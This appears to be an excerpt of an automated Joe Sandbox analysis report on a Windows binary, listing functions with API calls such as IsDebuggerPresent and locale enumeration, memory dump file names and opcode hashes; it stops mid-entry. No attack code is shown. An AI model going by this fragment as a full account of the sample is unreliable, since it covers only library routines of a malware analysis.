                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: InfoLocale$ErrorLast
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 661929714-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 761233cabb0bf7f461de04646cffcdf3773b15c16eec9f9e33389294ed656fcc
                                                                                                                                                                                                                                                                                                  • Instruction ID: 05fe89150545e427f07af8a51d482b5d61dc4ad8b933aac76cd14d1e6dba507a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 761233cabb0bf7f461de04646cffcdf3773b15c16eec9f9e33389294ed656fcc
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6861CE739301179BDF2A9F64ED82BAAB3A8EF04300F11556BF805CA689E774DD85CB50
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003CD209 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 003CD301
                                                                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 003CD30B
                                                                                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 003CD318
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: e375c6ae698db3500fa7e430ada4b190a7fb059851719c5c82c481f7a56aa948
                                                                                                                                                                                                                                                                                                  • Instruction ID: 9d11ea64bd4136382c8307c8b258fa3a88335f03be80ff14b0154bbf5a0f36d5
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e375c6ae698db3500fa7e430ada4b190a7fb059851719c5c82c481f7a56aa948
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6131A47590122C9BCB22DF64DD89B9DBBB8BF08310F5041EAE41CAB290E7749F858F55
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003D4C60 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,003D4C5B,?,?,00000008,?,?,003E1825,00000000), ref: 003D4E8D
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ExceptionRaise
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3997070919-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 9841ab403eeade3ac12c41b6f7f6a55cc29c69105c0a287567866d4ec179c88e
                                                                                                                                                                                                                                                                                                  • Instruction ID: cea3b03755897d02dc3fa9c59d9ad332fbfe1d72891aa1526e3a1c053c9bc536
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9841ab403eeade3ac12c41b6f7f6a55cc29c69105c0a287567866d4ec179c88e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AEB15C32610608DFD716CF28D48AB657BE1FF45364F268659E89ACF3A2C335E991CB40
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003C62BC Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 003C62D2
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2325560087-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 001d8f61ea4d9b1dd6498fd277c6bf273396d37135ff793c62ba498841c16d6b
                                                                                                                                                                                                                                                                                                  • Instruction ID: c63a086043d072f21fc8b9011f0599a3c4e3ce18e1bb4a83abcb1a513b250c31
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 001d8f61ea4d9b1dd6498fd277c6bf273396d37135ff793c62ba498841c16d6b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 61518E71A11645DBDB2ACF59D982BAABBF4FB48310F15852ED405EB2A0D3B99D00CF50
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003D90D1 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                  • Opcode ID: c5e8134f51a06610819c3092b7001d96d1722e32e90d25dba744169e624d3b6d
                                                                                                                                                                                                                                                                                                  • Instruction ID: 36e112942fda7f62c9260278f27fcebff70331f4c023485db3f5ef837fddc3c9
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c5e8134f51a06610819c3092b7001d96d1722e32e90d25dba744169e624d3b6d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F941C2B6C0421DAECF21DF69DC89AAABBB9EF45304F1442DEE41DD7201DA359E858F10
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003CB962 Relevance: 1.6, Strings: 1, Instructions: 344COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                                                                  • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                                                  • Opcode ID: d32fa742f92c646a805b8e52e00062a82d427dbec5c34cbc29bcec4da065ddc8
                                                                                                                                                                                                                                                                                                  • Instruction ID: e174a282cf09564fdfdbafefa141b4e5acc797618a7132119ced95b99b75c88b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d32fa742f92c646a805b8e52e00062a82d427dbec5c34cbc29bcec4da065ddc8
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E8C1EE34A0064A8FCB2ACF28C492FBEFBB5AF05300F25461DD596DB691CB31AD45CB91
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003DC2EB Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003D42B1: GetLastError.KERNEL32(?,00000008,003D89CA), ref: 003D42B5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003D42B1: SetLastError.KERNEL32(00000000,003ED3A8,00000024,003CFBA9), ref: 003D4357
                                                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 003DC33F
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3736152602-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 6c85d4f4a4e623fb9ef8baac51d7ac9a2d826866cf95ba8f652f077f38fe9087
                                                                                                                                                                                                                                                                                                  • Instruction ID: b74cbf97022a0c3df1bbfe93e3092e543a4461bcc068fe9370ee8ddf7b65464b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6c85d4f4a4e623fb9ef8baac51d7ac9a2d826866cf95ba8f652f077f38fe9087
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EC21A177620207ABEB2A9F25EC42EBA77ACEF44300F11506BF905DA241EA78ED40C750
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003DBF72 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003D42B1: GetLastError.KERNEL32(?,00000008,003D89CA), ref: 003D42B5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003D42B1: SetLastError.KERNEL32(00000000,003ED3A8,00000024,003CFBA9), ref: 003D4357
                                                                                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(003DC098,00000001,00000000,?,-00000050,?,003DC6C9,00000000,?,?,?,00000055,?), ref: 003DBFE4
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2417226690-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 85119a2416e634350b3741fd05004e4119f1e0f8b0932266583dfb907a20d51b
                                                                                                                                                                                                                                                                                                  • Instruction ID: b66919ee1d4132f43a695692f2ac918096b0b807519d1ac1ef6876ad1907ad7c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 85119a2416e634350b3741fd05004e4119f1e0f8b0932266583dfb907a20d51b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E114C3B210701DFDB199F39D8915BAB791FF84758B16452EEA4747B40D771B802CB40
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003DC51A Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003D42B1: GetLastError.KERNEL32(?,00000008,003D89CA), ref: 003D42B5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003D42B1: SetLastError.KERNEL32(00000000,003ED3A8,00000024,003CFBA9), ref: 003D4357
                                                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,003DC2B4,00000000,00000000,?), ref: 003DC546
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3736152602-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: ce4348bab2b68b56af713996d8143894c25bc3737671fa397002dd2966c50859
                                                                                                                                                                                                                                                                                                  • Instruction ID: 58dec33cd02df2730bd7c8df23bdd9f010105f473dc7349b4d7bc613c944f9ba
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce4348bab2b68b56af713996d8143894c25bc3737671fa397002dd2966c50859
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50F0F933930117BBDF269A61AC45ABA7759EF41754F060426EC06A3280DA30FE41C590
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003DC00D Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003D42B1: GetLastError.KERNEL32(?,00000008,003D89CA), ref: 003D42B5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003D42B1: SetLastError.KERNEL32(00000000,003ED3A8,00000024,003CFBA9), ref: 003D4357
                                                                                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(003DC2EB,00000001,?,?,-00000050,?,003DC68D,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 003DC057
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2417226690-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: f7967671554772ad98cbfe8adbac8c58636cd5d46786f983dcc59f392099812e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 49d262c687c2ab29b2fd8054bfb168ded665272b110323c72cf34847042f265c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f7967671554772ad98cbfe8adbac8c58636cd5d46786f983dcc59f392099812e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06F0F6372203059FDB265F79EC81ABABB95FF80768F05442EFA468B790C6719C02CB50
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003D52B3 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003CD557: EnterCriticalSection.KERNEL32(?,?,003D3F89,?,003ED208,00000008,003D414D,?,003CB2B6,?), ref: 003CD566
                                                                                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(003D52A6,00000001,003ED2C8,0000000C,003D56D5,00000000), ref: 003D52EB
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1272433827-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: df31490785431ca445a09b08d1e1f33b7cecc1ec86020952a71c6e15e9c8bd16
                                                                                                                                                                                                                                                                                                  • Instruction ID: c822fb56830994def69da444322b6a6ea416026df1d8450576e16aa411db045a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: df31490785431ca445a09b08d1e1f33b7cecc1ec86020952a71c6e15e9c8bd16
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9AF03776A00600AFD722EF98E842B9D77B0FB09721F10822AF511DB3E0C7B95A04CB80
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003DBF27 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
